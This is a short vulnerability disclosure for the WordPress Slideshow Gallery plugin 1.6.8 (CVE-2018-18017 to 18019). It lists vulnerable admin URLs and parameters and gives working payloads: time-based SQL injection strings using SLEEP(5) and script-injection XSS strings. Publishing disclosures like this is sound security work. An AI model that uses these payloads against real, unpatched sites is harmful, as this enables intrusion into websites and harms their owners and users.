XSS and SQLi in Slideshow Gallery plugin for WordPress - CVE-2018-18017 to CVE-2018-18019

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )

LinkedIn: https://www.linkedin.com/in/ansaert/

Discovered Date: October 4 2018

Tested Version: 1.6.8

Active installations: 20,000+

Plugin: https://wordpress.org/plugins/slideshow-gallery/

#1 - SQLi vulnerability in Manage Galleries - CVE-2018-18018

Affected Vectors:

1. Gallery[id]
2. Gallery[title]

Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

1. Gallery[id]=1' AND SLEEP(5) AND 'XZlZ'='XZlZ
2. Gallery[title]=ansa' OR SLEEP(5) AND 'jZQR'='jZQRn

#2 - XSS vulnerability in Manage Galleries - CVE-2018-18017

Affected Vectors:

1. Gallery[id]
2. Gallery[title]

Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

1. Gallery[id]=1'"><script>alert(1);</script>
2. Gallery[title]="><script>alert(2);</script>

#3 - XSS vulnerability in Manage Slides - CVE-2018-18019

Affected Vectors:

1. Slide[title]
2. Slide[media_file] or Slide[image_url]

Locate:

http://localhost/wordpress498/wp-admin/admin.php?page=slideshow-slides&method=save

Enter the Payload:

1. Slide[title] = ansa"><script>alert(1);</script>
2. Slide[media_file] or Slide[image_url]= "><script>alert(2);</script>